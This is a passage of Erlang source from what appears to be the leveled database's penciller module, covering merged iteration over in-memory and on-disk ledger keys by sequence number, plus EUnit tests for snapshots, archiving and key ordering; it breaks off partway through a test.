        {T, R} ->
            leveled_log:log(pc016, [PID, T, Level, found]),
            R
    end.
-spec compare_to_sqn(
    leveled_codec:ledger_kv()|leveled_codec:sqn()|not_present,
    integer()) -> sqn_check().
%% Check to see if the SQN in the penciller is after the SQN expected for an
%% object - returning missing/replaced/current accordingly.
compare_to_sqn(not_present, _SQN) ->
    missing;
compare_to_sqn(ObjSQN, SQN) when is_integer(ObjSQN), ObjSQN > SQN ->
    replaced;
compare_to_sqn(ObjSQN, _SQN) when is_integer(ObjSQN) ->
    %% Normally we would expect the SQN to be equal here, but
    %% this also allows for the Journal to have a more advanced
    %% SQN than the Ledger
    current;
compare_to_sqn(Obj, SQN) ->
    %% A full ledger KV was passed - strip it down to its SQN first
    compare_to_sqn(leveled_codec:strip_to_seqonly(Obj), SQN).
-spec keyfolder(list(), list(), tuple(), tuple(),
                {pclacc_fun(), any(), pos_integer()}) -> any().
%% Fold an accumulator across the merge of the in-memory iterator (IMMiter)
%% and the persisted-store iterator (SSTiter) within the key range.
%% A Segment List and a MaxKeys may be passed.  Every time something is added
%% to the accumulator MaxKeys is reduced - so set MaxKeys to -1 if it is
%% intended to be unlimited.
%% The basic principle is to take the next key in the IMMiter and compare it
%% to the next key in the SSTiter, and decide which one should be added to the
%% accumulator next (handling any clash of equal keys between the two).
keyfolder(IMMiter, SSTiter, StartKey, EndKey, {AccFun, Acc, Now}) ->
    keyfolder({IMMiter, SSTiter},
                {StartKey, EndKey},
                {AccFun, Acc, Now},
                {false, {0, infinity}, -1}).

keyfolder(_Iterators,
            _KeyRange,
            {_AccFun, Acc, _Now},
            {_SegmentList, _LastModRange, MaxKeys}) when MaxKeys == 0 ->
    {0, Acc};
keyfolder({[], SSTiter}, KeyRange, {AccFun, Acc, Now},
            {SegmentList, LastModRange, MaxKeys}) ->
    %% In-memory iterator is exhausted - everything else comes from the
    %% persisted store
    {StartKey, EndKey} = KeyRange,
    case find_nextkey(SSTiter, StartKey, EndKey,
                        SegmentList, element(1, LastModRange)) of
        no_more_keys ->
            case MaxKeys > 0 of
                true ->
                    {MaxKeys, Acc};
                false ->
                    %% This query started with a MaxKeys set to -1.  Query is
                    %% not interested in having MaxKeys in Response
                    Acc
            end;
        {NxSSTiter, {SSTKey, SSTVal}} ->
            {Acc1, MK1} =
                maybe_accumulate(SSTKey, SSTVal,
                                    {Acc, AccFun, Now},
                                    MaxKeys, LastModRange),
            keyfolder({[], NxSSTiter},
                        KeyRange,
                        {AccFun, Acc1, Now},
                        {SegmentList, LastModRange, MK1})
    end;
keyfolder({[{IMMKey, IMMVal}|NxIMMiterator], SSTiterator},
            KeyRange,
            {AccFun, Acc, Now},
            {SegmentList, LastModRange, MaxKeys}) ->
    {StartKey, EndKey} = KeyRange,
    %% NOTE(review): there is no {true, _} clause below, so an in-memory key
    %% before StartKey would raise case_clause - confirm the IMM iterator is
    %% always pre-filtered to the range before this is called
    case {IMMKey < StartKey, leveled_codec:endkey_passed(EndKey, IMMKey)} of
        {false, true} ->
            %% No more in-memory keys are in range, so continue with only
            %% the persisted-store iterator
            keyfolder({[], SSTiterator},
                        KeyRange,
                        {AccFun, Acc, Now},
                        {SegmentList, LastModRange, MaxKeys});
        {false, false} ->
            case find_nextkey(SSTiterator, StartKey, EndKey,
                                SegmentList, element(1, LastModRange)) of
                no_more_keys ->
                    %% No more keys in range in the persisted store, so use
                    %% the in-memory KV as the next
                    {Acc1, MK1} =
                        maybe_accumulate(IMMKey, IMMVal,
                                            {Acc, AccFun, Now},
                                            MaxKeys, LastModRange),
                    keyfolder({NxIMMiterator,
                                    []},
                                KeyRange,
                                {AccFun, Acc1, Now},
                                {SegmentList, LastModRange, MK1});
                {NxSSTiterator, {SSTKey, SSTVal}} ->
                    %% There is a next key, so need to know which is the
                    %% next key between the two (and handle two keys with
                    %% different sequence numbers for the same key)
                    case leveled_codec:key_dominates({IMMKey,
                                                            IMMVal},
                                                        {SSTKey,
                                                            SSTVal}) of
                        left_hand_first ->
                            {Acc1, MK1} =
                                maybe_accumulate(IMMKey, IMMVal,
                                                    {Acc, AccFun, Now},
                                                    MaxKeys, LastModRange),
                            %% Stow the previous best result away at Level -1
                            %% so it is not lost when the SST iterator is
                            %% next consulted
                            NewEntry = {-1, [{SSTKey, SSTVal}]},
                            keyfolder({NxIMMiterator,
                                            lists:keystore(-1,
                                                            1,
                                                            NxSSTiterator,
                                                            NewEntry)},
                                        KeyRange,
                                        {AccFun, Acc1, Now},
                                        {SegmentList, LastModRange, MK1});
                        right_hand_first ->
                            {Acc1, MK1} =
                                maybe_accumulate(SSTKey, SSTVal,
                                                    {Acc, AccFun, Now},
                                                    MaxKeys, LastModRange),
                            keyfolder({[{IMMKey, IMMVal}|NxIMMiterator],
                                            NxSSTiterator},
                                        KeyRange,
                                        {AccFun, Acc1, Now},
                                        {SegmentList, LastModRange, MK1});
                        left_hand_dominant ->
                            {Acc1, MK1} =
                                maybe_accumulate(IMMKey, IMMVal,
                                                    {Acc, AccFun, Now},
                                                    MaxKeys, LastModRange),
                            %% We can add to the accumulator here.  As the SST
                            %% key is dominated it can simply be dropped, and
                            %% so there is no need to hold off until the IMMKey
                            %% is left hand first.
                            keyfolder({NxIMMiterator,
                                            NxSSTiterator},
                                        KeyRange,
                                        {AccFun, Acc1, Now},
                                        {SegmentList, LastModRange, MK1})
                    end
            end
    end.
-spec maybe_accumulate(leveled_codec:ledger_key(),
                        leveled_codec:ledger_value(),
                        {any(), pclacc_fun(), pos_integer()},
                        integer(),
                        {non_neg_integer(), non_neg_integer()|infinity})
                            -> any().
%% Apply AccFun to the KV only if it is active at the query start time and
%% its last-modified date is inside the requested range (an undefined LMD
%% always passes); MaxKeys is decremented only on accumulation.
maybe_accumulate(LK, LV,
                    {Acc, AccFun, QueryStartTime},
                    MaxKeys,
                    {LowLastMod, HighLastMod}) ->
    {_SQN, _SH, LMD} = leveled_codec:strip_to_indexdetails({LK, LV}),
    RunAcc =
        (LMD == undefined) or
        ((LMD >= LowLastMod) and (LMD =< HighLastMod)),
    case RunAcc and leveled_codec:is_active(LK, LV, QueryStartTime) of
        true ->
            {AccFun(LK, LV, Acc), MaxKeys - 1};
        false ->
            {Acc, MaxKeys}
    end.
-spec find_nextkey(iterator(),
                    leveled_codec:ledger_key(), leveled_codec:ledger_key()) ->
                        no_more_keys|{iterator(), leveled_codec:ledger_kv()}.
%% Convenience arities for the full find_nextkey/8 scan: no segment list
%% filter and no low last-modified bound by default.
find_nextkey(QueryArray, StartKey, EndKey) ->
    find_nextkey(QueryArray, StartKey, EndKey, false, 0).

find_nextkey(QueryArray, StartKey, EndKey, SegmentList, LowLastMod) ->
    %% Start the scan above the top level (-1) with no best key yet
    find_nextkey(QueryArray,
                    -1,
                    {null, null},
                    StartKey, EndKey,
                    SegmentList,
                    LowLastMod,
                    ?ITERATOR_SCANWIDTH).
%% Scan the query array level by level, tracking the best (lowest, and on a
%% clash highest-SQN) key seen so far, expanding file/slot pointers as they
%% are encountered.
find_nextkey(_QueryArray, LCnt,
                {null, null},
                _StartKey, _EndKey,
                _SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
    %% All levels scanned without finding any key in range
    no_more_keys;
find_nextkey(QueryArray, LCnt,
                {BKL, BestKV},
                _StartKey, _EndKey,
                _SegList, _LowLastMod, _Width) when LCnt > ?MAX_LEVELS ->
    %% All levels scanned - so need to remove the best result from
    %% the array, and return that array along with the best key/sqn/status
    %% combination
    {BKL, [BestKV|Tail]} = lists:keyfind(BKL, 1, QueryArray),
    {lists:keyreplace(BKL, 1, QueryArray, {BKL, Tail}), BestKV};
find_nextkey(QueryArray, LCnt,
                {BestKeyLevel, BestKV},
                StartKey, EndKey,
                SegList, LowLastMod, Width) ->
    %% Take the next key from this level's list (if any)
    {NextKey, RestOfKeys} =
        case lists:keyfind(LCnt, 1, QueryArray) of
            false ->
                {null, null};
            {LCnt, []} ->
                {null, null};
            {LCnt, [NK|ROfKs]} ->
                {NK, ROfKs}
        end,
    case {NextKey, BestKeyLevel, BestKV} of
        {null, BKL, BKV} ->
            %% Nothing at this level - move down a level
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{next, Owner, _SK}, BKL, BKV} ->
            %% The first key at this level is pointer to a file - need to
            %% query the file to expand it into real keys
            Pointer = {next, Owner, StartKey, EndKey},
            UpdList = leveled_sst:sst_expandpointer(Pointer,
                                                    RestOfKeys,
                                                    Width,
                                                    SegList,
                                                    LowLastMod),
            NewEntry = {LCnt, UpdList},
            %% Need to loop around at this level (LCnt) as we have not yet
            %% examined an actual key at this level
            find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
                            LCnt,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{pointer, SSTPid, Slot, PSK, PEK}, BKL, BKV} ->
            %% The first key at this level is pointer within a file - need to
            %% expand the slot pointer into real keys
            Pointer = {pointer, SSTPid, Slot, PSK, PEK},
            UpdList = leveled_sst:sst_expandpointer(Pointer,
                                                    RestOfKeys,
                                                    Width,
                                                    SegList,
                                                    LowLastMod),
            NewEntry = {LCnt, UpdList},
            %% Need to loop around at this level (LCnt) as we have not yet
            %% examined an actual key at this level
            find_nextkey(lists:keyreplace(LCnt, 1, QueryArray, NewEntry),
                            LCnt,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{Key, Val}, null, null} ->
            %% No best key seen yet - this key becomes the candidate
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {LCnt, {Key, Val}},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{Key, Val}, _BKL, {BestKey, _BestVal}} when Key < BestKey ->
            %% A better (lower) key than the current best - note that
            %% the QueryArray is not modified until we have checked all levels
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {LCnt, {Key, Val}},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width);
        {{Key, Val}, BKL, {BestKey, BestVal}} when Key == BestKey ->
            %% Same key at two levels - the sequence numbers decide which
            %% version dominates
            SQN = leveled_codec:strip_to_seqonly({Key, Val}),
            BestSQN = leveled_codec:strip_to_seqonly({BestKey, BestVal}),
            if
                SQN =< BestSQN ->
                    %% This version is dominated - pop it from this level's
                    %% list and keep the existing best key
                    NewQArray = lists:keyreplace(LCnt,
                                                    1,
                                                    QueryArray,
                                                    {LCnt, RestOfKeys}),
                    find_nextkey(NewQArray,
                                    LCnt + 1,
                                    {BKL, {BestKey, BestVal}},
                                    StartKey, EndKey,
                                    SegList, LowLastMod, Width);
                SQN > BestSQN ->
                    %% There is a conflict with the best key - this key has
                    %% a higher SQN than the best key, so we should use this as
                    %% the best key, removing the old best from its level
                    OldBestEntry = lists:keyfind(BKL, 1, QueryArray),
                    {BKL, [{BestKey, BestVal}|BestTail]} = OldBestEntry,
                    find_nextkey(lists:keyreplace(BKL,
                                                    1,
                                                    QueryArray,
                                                    {BKL, BestTail}),
                                    LCnt + 1,
                                    {LCnt, {Key, Val}},
                                    StartKey, EndKey,
                                    SegList, LowLastMod, Width)
            end;
        {_, BKL, BKV} ->
            %% This level's key does not beat the current best - move on
            find_nextkey(QueryArray,
                            LCnt + 1,
                            {BKL, BKV},
                            StartKey, EndKey,
                            SegList, LowLastMod, Width)
    end.
-spec maybelog_fetch_timing(
    leveled_monitor:monitor(),
    memory|leveled_pmanifest:lsm_level(),
    leveled_monitor:timing(),
    boolean()) -> ok.
%% Push a fetch timing stat to the monitor process (no-op when timing was
%% not taken); a not-found fetch is recorded under not_found rather than the
%% level it bottomed out at.
maybelog_fetch_timing(_Monitor, _Level, no_timing, _NF) ->
    ok;
maybelog_fetch_timing({Pid, _StatsFreq}, _Level, FetchTime, true) ->
    leveled_monitor:add_stat(Pid, {pcl_fetch_update, not_found, FetchTime});
maybelog_fetch_timing({Pid, _StatsFreq}, Level, FetchTime, _NF) ->
    leveled_monitor:add_stat(Pid, {pcl_fetch_update, Level, FetchTime}).
-ifdef(TEST).
%% Test helper: generate Count pseudo-random object keys (bucket/key names
%% drawn from 1..1024, so collisions are expected) with sequential SQNs
%% starting from StartSQN.
generate_randomkeys({Count, StartSQN}) ->
    generate_randomkeys(Count, StartSQN, []).

generate_randomkeys(0, _SQN, Acc) ->
    lists:reverse(Acc);
generate_randomkeys(Count, SQN, Acc) ->
    K = {o,
            lists:concat(["Bucket", leveled_rand:uniform(1024)]),
            lists:concat(["Key", leveled_rand:uniform(1024)]),
            null},
    RandKey = {K,
                {SQN,
                    {active, infinity},
                    leveled_codec:segment_hash(K),
                    null}},
    generate_randomkeys(Count - 1, SQN + 1, [RandKey|Acc]).
%% Test helper: empty both the SST folder and the manifest folder.
clean_testdir(RootPath) ->
    clean_subdir(sst_rootpath(RootPath)),
    clean_subdir(filename:join(RootPath, ?MANIFEST_FP)).
%% Test helper: delete every file within DirPath (no-op if the directory
%% does not exist).
clean_subdir(DirPath) ->
    case filelib:is_dir(DirPath) of
        true ->
            {ok, Files} = file:list_dir(DirPath),
            lists:foreach(fun(FN) ->
                                File = filename:join(DirPath, FN),
                                ok = file:delete(File),
                                io:format("Success deleting ~s~n", [File])
                                end,
                            Files);
        false ->
            ok
    end.
%% Test helper: build a bookie-style cache tuple from KL and push it to the
%% penciller, sleeping and retrying while the penciller returns 'returned'
%% (i.e. while it is busy rolling level zero).
maybe_pause_push(PCL, KL) ->
    T0 = [],
    I0 = leveled_pmem:new_index(),
    T1 = lists:foldl(fun({K, V}, {AccSL, AccIdx, MinSQN, MaxSQN}) ->
                        UpdSL = [{K, V}|AccSL],
                        SQN = leveled_codec:strip_to_seqonly({K, V}),
                        H = leveled_codec:segment_hash(K),
                        UpdIdx = leveled_pmem:prepare_for_index(AccIdx, H),
                        {UpdSL, UpdIdx, min(SQN, MinSQN), max(SQN, MaxSQN)}
                        end,
                        {T0, I0, infinity, 0},
                        KL),
    SL = element(1, T1),
    Tree = leveled_tree:from_orderedlist(lists:ukeysort(1, SL), ?CACHE_TYPE),
    T2 = setelement(1, T1, Tree),
    case pcl_pushmem(PCL, T2) of
        returned ->
            timer:sleep(50),
            maybe_pause_push(PCL, KL);
        ok ->
            ok
    end.
%% Test helper: upgrade an old-style 3-element value tuple by inserting the
%% segment hash element.
add_missing_hash({K, {SQN, ST, MD}}) ->
    {K, {SQN, ST, leveled_codec:segment_hash(K), MD}}.
%% Unused .sst files should be renamed to .bak, used .sst files and files
%% with other extensions left alone.
archive_files_test() ->
    RootPath = "test/test_area/ledger",
    SSTPath = sst_rootpath(RootPath),
    ok = filelib:ensure_dir(SSTPath),
    ok = file:write_file(SSTPath ++ "/test1.sst", "hello_world"),
    ok = file:write_file(SSTPath ++ "/test2.sst", "hello_world"),
    ok = file:write_file(SSTPath ++ "/test3.bob", "hello_world"),
    UsedFiles = ["./test1.sst"],
    ok = archive_files(RootPath, UsedFiles),
    {ok, AllFiles} = file:list_dir(SSTPath),
    ?assertMatch(true, lists:member("test1.sst", AllFiles)),
    ?assertMatch(false, lists:member("test2.sst", AllFiles)),
    ?assertMatch(true, lists:member("test3.bob", AllFiles)),
    ?assertMatch(true, lists:member("test2.bak", AllFiles)),
    ok = clean_subdir(SSTPath).
%% Test helper: poll (up to 100 times, 200ms apart) until the penciller
%% reports no outstanding compaction work, then close it.
shutdown_when_compact(Pid) ->
    FoldFun =
        fun(_I, Ready) ->
            case Ready of
                true ->
                    true;
                false ->
                    timer:sleep(200),
                    not pcl_checkforwork(Pid)
            end
        end,
    true = lists:foldl(FoldFun, false, lists:seq(1, 100)),
    io:format("No outstanding compaction work for ~w~n", [Pid]),
    pcl_close(Pid).
%% format_status/2 should redact the four large state fields for the
%% terminate case while sys:get_status still sees real state.
format_status_test() ->
    RootPath = "test/test_area/ledger",
    clean_testdir(RootPath),
    {ok, PCL} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    {status, PCL, {module, gen_server}, SItemL} = sys:get_status(PCL),
    S = lists:keyfind(state, 1, lists:nth(5, SItemL)),
    true = is_integer(array:size(element(2, S#state.manifest))),
    ST = format_status(terminate, [dict:new(), S]),
    ?assertMatch(redacted, ST#state.manifest),
    ?assertMatch(redacted, ST#state.levelzero_cache),
    ?assertMatch(redacted, ST#state.levelzero_index),
    ?assertMatch(redacted, ST#state.levelzero_astree),
    clean_testdir(RootPath).
%% End-to-end test: push keys, fetch them back, restart the store and check
%% persistence, then take snapshots and check sequence-number visibility
%% semantics across subsequent updates.
simple_server_test() ->
    RootPath = "test/test_area/ledger",
    clean_testdir(RootPath),
    {ok, PCL} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    Key1_Pre = {{o,"Bucket0001", "Key0001", null},
                    {1, {active, infinity}, null}},
    Key1 = add_missing_hash(Key1_Pre),
    KL1 = generate_randomkeys({1000, 2}),
    Key2_Pre = {{o,"Bucket0002", "Key0002", null},
                {1002, {active, infinity}, null}},
    Key2 = add_missing_hash(Key2_Pre),
    KL2 = generate_randomkeys({900, 1003}),
    %% Keep below the table size by having 900 not 1000
    Key3_Pre = {{o,"Bucket0003", "Key0003", null},
                {2003, {active, infinity}, null}},
    Key3 = add_missing_hash(Key3_Pre),
    KL3 = generate_randomkeys({1000, 2004}),
    Key4_Pre = {{o,"Bucket0004", "Key0004", null},
                {3004, {active, infinity}, null}},
    Key4 = add_missing_hash(Key4_Pre),
    KL4 = generate_randomkeys({1000, 3005}),
    ok = maybe_pause_push(PCL, [Key1]),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ok = maybe_pause_push(PCL, KL1),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ok = maybe_pause_push(PCL, [Key2]),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
    ok = maybe_pause_push(PCL, KL2),
    ?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
    ok = maybe_pause_push(PCL, [Key3]),
    ?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PCL, {o,"Bucket0003", "Key0003", null})),
    true = pcl_checkbloomtest(PCL, {o,"Bucket0001", "Key0001", null}),
    true = pcl_checkbloomtest(PCL, {o,"Bucket0002", "Key0002", null}),
    true = pcl_checkbloomtest(PCL, {o,"Bucket0003", "Key0003", null}),
    false = pcl_checkbloomtest(PCL, {o,"Bucket9999", "Key9999", null}),
    ok = shutdown_when_compact(PCL),
    %% Restart and confirm the persisted state is intact
    {ok, PCLr} =
        pcl_start(#penciller_options{root_path=RootPath,
                                        max_inmemory_tablesize=1000,
                                        sst_options=#sst_options{}}),
    ?assertMatch(2003, pcl_getstartupsequencenumber(PCLr)),
    %% ok = maybe_pause_push(PCLr, [Key2] ++ KL2 ++ [Key3]),
    true = pcl_checkbloomtest(PCLr, {o,"Bucket0001", "Key0001", null}),
    true = pcl_checkbloomtest(PCLr, {o,"Bucket0002", "Key0002", null}),
    true = pcl_checkbloomtest(PCLr, {o,"Bucket0003", "Key0003", null}),
    false = pcl_checkbloomtest(PCLr, {o,"Bucket9999", "Key9999", null}),
    ?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
    ok = maybe_pause_push(PCLr, KL3),
    ok = maybe_pause_push(PCLr, [Key4]),
    ok = maybe_pause_push(PCLr, KL4),
    ?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
    ?assertMatch(Key4, pcl_fetch(PCLr, {o,"Bucket0004", "Key0004", null})),
    {ok, PclSnap, null} =
        leveled_bookie:snapshot_store(
            leveled_bookie:empty_ledgercache(),
            PCLr,
            null,
            {no_monitor, 0},
            ledger,
            undefined,
            false),
    ?assertMatch(Key1, pcl_fetch(PclSnap, {o,"Bucket0001", "Key0001", null})),
    ?assertMatch(Key2, pcl_fetch(PclSnap, {o,"Bucket0002", "Key0002", null})),
    ?assertMatch(Key3, pcl_fetch(PclSnap, {o,"Bucket0003", "Key0003", null})),
    ?assertMatch(Key4, pcl_fetch(PclSnap, {o,"Bucket0004", "Key0004", null})),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    1)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0002",
                                                        "Key0002",
                                                        null},
                                                    1002)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0003",
                                                        "Key0003",
                                                        null},
                                                    2003)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0004",
                                                        "Key0004",
                                                        null},
                                                    3004)),
    %% Replace Key1 in the live store - the existing snapshot must still see
    %% the original version as current
    Key1A_Pre = {{o,"Bucket0001", "Key0001", null},
                    {4005, {active, infinity}, null}},
    Key1A = add_missing_hash(Key1A_Pre),
    KL1A = generate_randomkeys({2000, 4006}),
    ok = maybe_pause_push(PCLr, [Key1A]),
    ok = maybe_pause_push(PCLr, KL1A),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    1)),
    ok = pcl_close(PclSnap),
    %% A fresh snapshot sees the replacement
    {ok, PclSnap2, null} =
        leveled_bookie:snapshot_store(
            leveled_bookie:empty_ledgercache(),
            PCLr,
            null,
            {no_monitor, 0},
            ledger,
            undefined,
            false),
    ?assertMatch(replaced, pcl_checksequencenumber(PclSnap2,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    1)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap2,
                                                    {o,
                                                        "Bucket0001",
                                                        "Key0001",
                                                        null},
                                                    4005)),
    ?assertMatch(current, pcl_checksequencenumber(PclSnap2,
                                                    {o,
                                                        "Bucket0002",
                                                        "Key0002",
                                                        null},
                                                    1002)),
    ok = pcl_close(PclSnap2),
    ok = pcl_close(PCLr),
    clean_testdir(RootPath).
%% find_nextkey/3 should emit keys in key order across the levels
%% (Key1, Key2, Key3, Key5) and then no_more_keys.
simple_findnextkey_test() ->
    QueryArray = [
    {2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
            {{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
    {3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
    {5, [{{o, "Bucket1", "Key2", null}, {2, {active, infinity}, {0, 0}, null}}]}
    ],
    {Array2, KV1} = find_nextkey(QueryArray,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key1", null},
                        {5, {active, infinity}, {0, 0}, null}},
                    KV1),
    {Array3, KV2} = find_nextkey(Array2,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key2", null},
                        {2, {active, infinity}, {0, 0}, null}},
                    KV2),
    {Array4, KV3} = find_nextkey(Array3,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key3", null},
                        {3, {active, infinity}, {0, 0}, null}},
                    KV3),
    {Array5, KV4} = find_nextkey(Array4,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key5", null},
                        {4, {active, infinity}, {0, 0}, null}},
                    KV4),
    ER = find_nextkey(Array5,
                        {o, "Bucket1", "Key0", null},
                        {o, "Bucket1", "Key5", null}),
    ?assertMatch(no_more_keys, ER).
%% When the same key (Key5) exists at two levels, the version with the
%% higher SQN (level 2, SQN 4) should win and the dominated version should
%% be consumed silently.
sqnoverlap_findnextkey_test() ->
    QueryArray = [
    {2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
            {{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
    {3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
    {5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
    ],
    {Array2, KV1} = find_nextkey(QueryArray,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key1", null},
                        {5, {active, infinity}, {0, 0}, null}},
                    KV1),
    {Array3, KV2} = find_nextkey(Array2,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key3", null},
                        {3, {active, infinity}, {0, 0}, null}},
                    KV2),
    {Array4, KV3} = find_nextkey(Array3,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key5", null},
                        {4, {active, infinity}, {0, 0}, null}},
                    KV3),
    ER = find_nextkey(Array4,
                        {o, "Bucket1", "Key0", null},
                        {o, "Bucket1", "Key5", null}),
    ?assertMatch(no_more_keys, ER).
%% As sqnoverlap_findnextkey_test but with the dominant SQN at the lower
%% level (level 5, SQN 2 beats level 2, SQN 1).
sqnoverlap_otherway_findnextkey_test() ->
    QueryArray = [
    {2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
            {{o, "Bucket1", "Key5", null}, {1, {active, infinity}, {0, 0}, null}}]},
    {3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
    {5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
    ],
    {Array2, KV1} = find_nextkey(QueryArray,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key1", null},
                        {5, {active, infinity}, {0, 0}, null}},
                    KV1),
    {Array3, KV2} = find_nextkey(Array2,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key3", null},
                        {3, {active, infinity}, {0, 0}, null}},
                    KV2),
    {Array4, KV3} = find_nextkey(Array3,
                                    {o, "Bucket1", "Key0", null},
                                    {o, "Bucket1", "Key5", null}),
    ?assertMatch({{o, "Bucket1", "Key5", null},
                        {2, {active, infinity}, {0, 0}, null}},
                    KV3),
    ER = find_nextkey(Array4,
                        {o, "Bucket1", "Key0", null},
                        {o, "Bucket1", "Key5", null}),
    ?assertMatch(no_more_keys, ER).
%% keyfolder/5 should merge the in-memory iterator with the query array,
%% with the in-memory version of Key1 (SQN 8) dominating the persisted one.
foldwithimm_simple_test() ->
    Now = leveled_util:integer_now(),
    QueryArray = [
        {2, [{{o, "Bucket1", "Key1", null},
                    {5, {active, infinity}, 0, null}},
                {{o, "Bucket1", "Key5", null},
                    {1, {active, infinity}, 0, null}}]},
        {3, [{{o, "Bucket1", "Key3", null},
                {3, {active, infinity}, 0, null}}]},
        {5, [{{o, "Bucket1", "Key5", null},
                {2, {active, infinity}, 0, null}}]}
    ],
    KL1A = [{{o, "Bucket1", "Key6", null}, {7, {active, infinity}, 0, null}},
            {{o, "Bucket1", "Key1", null}, {8, {active, infinity}, 0, null}},
            {{o, "Bucket1", "Key8", null}, {9, {active, infinity}, 0, null}}],
    IMM2 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1A), ?CACHE_TYPE),
    IMMiter = leveled_tree:match_range({o, "Bucket1", "Key1", null},
                                        {o, null, null, null},
                                        IMM2),
    AccFun = fun(K, V, Acc) -> SQN = leveled_codec:strip_to_seqonly({K, V}),
                                Acc ++ [{K, SQN}] end,
    Acc = keyfolder(IMMiter,
                    QueryArray,
                    {o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
                    {AccFun, [], Now}),
    ?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
                    {{o, "Bucket1", "Key3", null}, 3},
                    {{o, "Bucket1", "Key5", null}, 2},
                    {{o, "Bucket1", "Key6", null}, 7}], Acc),
    %% An in-memory iterator exhausted before the end of the range still
    %% yields the remaining persisted keys
    IMMiterA = [{{o, "Bucket1", "Key1", null},
                    {8, {active, infinity}, 0, null}}],
    AccA = keyfolder(IMMiterA,
                        QueryArray,
                        {o, "Bucket1", "Key1", null},
                        {o, "Bucket1", "Key6", null},
                        {AccFun, [], Now}),
    ?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
                    {{o, "Bucket1", "Key3", null}, 3},
                    {{o, "Bucket1", "Key5", null}, 2}], AccA),
    AddKV = {{o, "Bucket1", "Key4", null}, {10, {active, infinity}, 0, null}},
    KL1B = [AddKV|KL1A],
    IMM3 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1B), ?CACHE_TYPE),
